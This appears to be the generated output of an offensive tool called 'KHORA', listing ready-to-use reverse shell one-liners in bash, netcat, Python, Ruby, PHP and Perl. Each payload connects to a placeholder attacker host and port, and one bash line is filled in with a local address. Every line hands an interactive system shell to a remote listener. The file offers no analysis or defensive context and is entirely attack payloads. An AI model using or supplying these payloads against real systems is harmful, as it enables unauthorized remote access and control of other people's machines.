[KHORA] Reverse Shell Payloads
Generated: 2026-02-17 09:56:55.327631
Developer: 2b53
======================================================================

[BASH]
  bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1

[BASH_ALT]
  bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

[NC]
  nc -e /bin/sh {LHOST} {LPORT}

[NC_ALT]
  nc {LHOST} {LPORT} -e /bin/bash

[PYTHON]
  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

[PYTHON3]
  python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

[RUBY]
  ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

[PHP]
  php -r '$sock=fsockopen("{LHOST}",{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");'

[PERL]
  perl -e 'use Socket;$i="{LHOST}";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

